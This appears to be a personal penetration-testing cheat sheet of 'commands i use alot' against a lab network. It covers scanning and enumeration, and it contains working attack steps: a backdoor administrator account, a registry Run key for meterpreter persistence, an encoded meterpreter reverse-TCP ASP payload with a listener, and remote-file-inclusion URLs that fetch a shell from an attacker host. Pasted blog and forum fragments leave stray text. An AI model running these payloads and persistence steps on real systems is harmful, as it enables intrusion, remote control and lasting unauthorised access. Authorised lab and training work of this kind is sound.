commands i use alot

creat list of ip's

for ip in $(seq 200 255);do echo 192.168.15.$ip;done >ip.txt





===============================
nmap scan
===============================
cmd

nmap -T4 -F 192.168.15.200-255



===============================
dns enumeration
===============================

for ip in $(seq 200 255); do

host -t ns 192.168.15.$ip |grep "domain name pointer" |cut -d " " -f5 >> names.txt

done




===============================
send mail
===============================

sendEmail -t bob@thinc.local -f bob@thinc.local -s 192.168.15.227 -u report -a /root/Documents/report.pdf


./dnsenum.pl thinc.local >>/root/Desktop/pw3tools/updatedtest/dnsenum.txt


===============================
snmp enumeration
===============================

or ip in $(seq 200 255); do

echo 192.168.15.$ip>> snmpnames.txt;snmpwalk -c public -v1 192.168.15.$ip 1.3 |grep 77.1.2.25 |cut -d " " -f4 >> snmpnames.txt

done



for ip in $(seq 200 255); do

echo 192.168.15.$ip>> snmpservices.txt;snmpwalk -c public -v1 192.168.15.$ip 1 |grep hrSWRunName |cut -d " " -f4 >> snmpservices.txt

done



/pentest/enumeration/snmp/onesixtyone/onesixtyone -c dic.txt -i ip.txt -o snmp.txt




===============================
smtp enumeration
===============================



#!/usr/bin/python
#useage python vrfy.py 127.0.0.1 < usernames.txt
import socket
import sys

users= []
for line in sys.stdin:
line= line.strip()
if line!='':
users.append(line)

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 25))
fp= s.makefile('rwb')

fp.readline() # ignore banner
fp.write('HELO test.example.com\r\n')
fp.flush()
fp.readline() # ignore response

for user in users:
fp.write('VRFY %s\r\n' % user)
fp.flush()
print '%s: %s' % (user, fp.readline().strip())

fp.write('QUIT\r\n')
fp.flush()
s.close()





===============================
smb enumeration
===============================
/pentest/python/impacket-examples# ./samrdump.py 192.168.15.236

smb4k

nmap 192.168.15.236 --script smb-enum-users.nse


===============================
full scan
===============================


nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script all 192.168.15.200-255







===============================
create user from cmd line
===============================


net user paul 23u75t0zjdj /add
net localgroup administrators paul /add


===============================
Enable remote desktop from command line
===============================


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v msg /t REG_SZ /d C:\inetpub\meterpreter.exe /f



===============================
create asp page with payload for remot run use IO::Socket;
===============================

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.126 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -a X86 -t asp > evilpage.asp



===============================
list allusers on linux
===============================
cat /etc/passwd | cut -d":" -f1


===============================
#!/bin/bash for num in $(seq 0 254);do nc -v 192.168.13.$num 53 done
===============================


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp





Source: http://www.rooftopsolutions.nl/blog/189use IO::Socket;
I killed the sshd daemon from one of our servers by accident today. I wanted to avoid going to the data center, so I was able to upload and run a
PHP script to give me a shell..
Problem was, that it would run under the www-data user and trying to su to root gave me the following message:
su : must be run from a terminal
After some googling, I found the solution from Tero's glob. If you have python installed, just run the following from your shell:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
You now have a proper terminal, and things like 'su' will work as usual.


===============================
run shell on remot web server
===============================

http://carnal0wnage.attackresearch.com/2010/05/using-metasploit-php-remote-file.html

/slogin_lib.inc.php?slogin_path=http://192.168.14.126/shll%00
/slogin_lib.inc.php?slogin_path=http://192.168.14.126/shll/ms.txt?%00







Shell recorder with replay        Terminal - Shell recorder with replay    script -t /tmp/mylog.out 2>/tmp/mylog.time; <do your work>; <CTRL-D>; scriptreplay /tmp/mylog.time /tmp/mylog.out     2011-01-19 07:16:30   User: olorin   Functions: script    19  Up
Down    Shell recorder with replay  
If you provide the option -t to the script command and redirect stderr into a file, the timing information on what is going on on the terminal, is also stored.

You can replay the session via the scriptreplay command, where you can also provide a speedup factor (see the man page for details).

Great for demonstration purposes ...
  Add to favourites | Report as malicious